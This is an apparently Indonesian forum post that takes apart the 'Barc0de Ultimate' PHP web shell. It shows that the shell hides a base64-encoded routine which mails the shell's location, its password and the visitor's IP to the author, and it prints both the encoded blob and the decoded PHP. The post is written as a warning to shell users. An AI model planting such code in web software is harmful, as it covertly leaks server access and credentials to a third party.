bongkar bongkar shell
// Barc0de Ultimate - www.code-security.com
// Author : uzanc | [email protected]
ketika melihat shell barcode aku terkejut ternyata ada keyloger / script send mailer nya BASE64
Code: Select all
JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07DQogaWYoICR2aXNpdGNvdW50ID09ICIiKQ0KIHskdmlzaXRjb3VudCA9IDA7IA0KICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07IA0KICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCiAkYm9keSA9ICJCb3NzLCBhZGEgeWFuZyB0ZWxhaCBtZW5hbmFtIGJhY2tkb29yIGRpIDogICR0YXJnZXQgfCBwYXNzd29yZCA9ICRtZDVfcGFzcyBJUCA9ICR2aXNpdG9yIjsgQG1haWwoImFhdXphbmNAZ21haWwuY29tIiwiS2V5bG9nZXIgQmFja2Rvb3IiLCAiJGJvZHkiKTsNCiB9IGVsc2UgeyANCiAkdmlzaXRjb3VudDsgDQogfSBzZXRjb29raWUoInZpc2l0cyIsJHZpc2l0Y291bnQpOw==\";
Code: Select all
$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "")
{$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$body = "Boss, ada yang telah menanam backdoor di : $target | password = $md5_pass IP = $visitor"; @mail("[email protected]","Keyloger Backdoor", "$body");
} else {
$visitcount;
} setcookie("visits",$visitcount);
maaf yah buat admin nya bukan untuk mempublikasi tapi supaya sadar saja